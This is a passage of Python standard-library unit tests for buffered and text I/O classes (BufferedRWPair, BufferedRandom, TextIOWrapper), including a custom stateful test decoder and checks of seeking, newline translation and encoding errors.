self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point in testing it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
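# Round-trip sketch of the state packing above: with i=2 and o=6,
# getstate() returns (buffer, (2 ^ 1) * 100 + (6 ^ 1)) == (buffer, 307),
# and setstate() recovers divmod(307, 100) == (3, 7) -> i=2, o=6.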
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
# bpo-41919: This method is separated from StatefulIncrementalDecoder to avoid a resource leak
# when registering codecs and cleanup functions.
def lookupTestDecoder(name):
if StatefulIncrementalDecoder.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=StatefulIncrementalDecoder)
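# lookupTestDecoder is registered via codecs.register() in
# TextIOWrapperTest.setUp(); the 'test_decoder' codec only resolves while
# StatefulIncrementalDecoder.codecEnabled is set (see test_seek_and_tell).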
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
os_helper.unlink(os_helper.TESTFN)
codecs.register(lookupTestDecoder)
self.addCleanup(codecs.unregister, lookupTestDecoder)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, encoding="utf-8", newline=42)
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO(), encoding="utf-8")
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b, encoding="ascii")
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw, encoding="utf-8")
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getencoding()
b = self.BytesIO()
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio, encoding="utf-8").xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(os_helper.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(os_helper.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(os_helper.TESTFN, "wb") as f:
f.write(line*2)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(os_helper.TESTFN, "wb") as f:
f.write(data)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
